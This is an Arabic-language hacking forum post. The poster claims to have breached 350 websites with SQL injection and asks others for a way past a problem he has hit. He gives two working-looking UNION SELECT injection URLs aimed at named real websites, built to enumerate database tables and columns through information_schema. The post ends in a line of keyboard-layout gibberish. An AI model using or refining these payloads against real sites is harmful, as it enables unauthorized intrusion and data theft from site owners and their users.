سلام عليكم ورحمه الله
اخواني انا واعوذ بالله من كلمه انا اخترقت 350 موقع بـ الـ sql يعني ولحمد لله متمكن من هاذي الثغره
لااكن واجهتني مشكله فـ الاونه الاخيره
وهيا مثل هاذا الموقع ...
كود PHP:
http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29--
وهاذا ..
كود PHP:
http://hotelacostacentro.com/noticia.php?id=-11%27%20UNION%20SELECT%201,2,3,4,%28CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,6,7,8,9,10,11,12+from+information_schema.columns%29--%20-
والكثير الكثير مثل هاذي المشكله
فـ اتمنى طريقة حل هاذي المشكله وطرح الطريقه لتعم الفائده الرجاء اي شخص يمر ع الموضوع يشارك ولو بظم صوته الى صوتي ..,
احترامي ,
l'g,,,,,f gghildi uf] hgwl] h, hd aow lpjvt >>>